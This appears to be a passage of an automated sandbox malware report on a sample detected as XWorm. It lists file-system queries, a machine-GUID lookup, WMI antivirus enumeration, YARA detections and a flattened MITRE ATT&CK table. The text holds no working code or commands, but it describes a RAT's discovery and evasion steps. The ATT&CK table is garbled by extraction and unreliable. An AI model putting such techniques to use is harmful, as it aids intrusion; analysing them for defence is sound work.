                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeQueries volume information: C:\Users\user\Desktop\YPzNsfg4nR.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeQueries volume information: C:\Users\user\Desktop\24572628.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\ProgramData\codingQueries volume information: C:\ProgramData\coding VolumeInformation
                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\ProgramData\codingQueries volume information: C:\ProgramData\coding VolumeInformation
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: 24572628.exe, 00000003.00000002.3436634276.000000001B40E000.00000004.00000020.00020000.00000000.sdmp, 24572628.exe, 00000003.00000002.3436634276.000000001B45A000.00000004.00000020.00020000.00000000.sdmp, 24572628.exe, 00000003.00000002.3436634276.000000001B3C3000.00000004.00000020.00020000.00000000.sdmp, 24572628.exe, 00000003.00000002.3422310755.00000000008E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\24572628.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\24572628.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\24572628.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: YPzNsfg4nR.exe PID: 7332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 24572628.exe PID: 7544, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\coding, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\Desktop\24572628.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: YPzNsfg4nR.exe PID: 7332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 24572628.exe PID: 7544, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\coding, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\Desktop\24572628.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		OS Credential Dumping1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory33
                    System Information Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell                    		21
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		2
                    Obfuscated Files or Information                    		Security Account Manager551
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Registry Run Keys / Startup Folder                    		22
                    Software Packing                    		NTDS2
                    Process Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets161
                    Virtualization/Sandbox Evasion                    		SSHKeylogging12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Masquerading                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job161
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
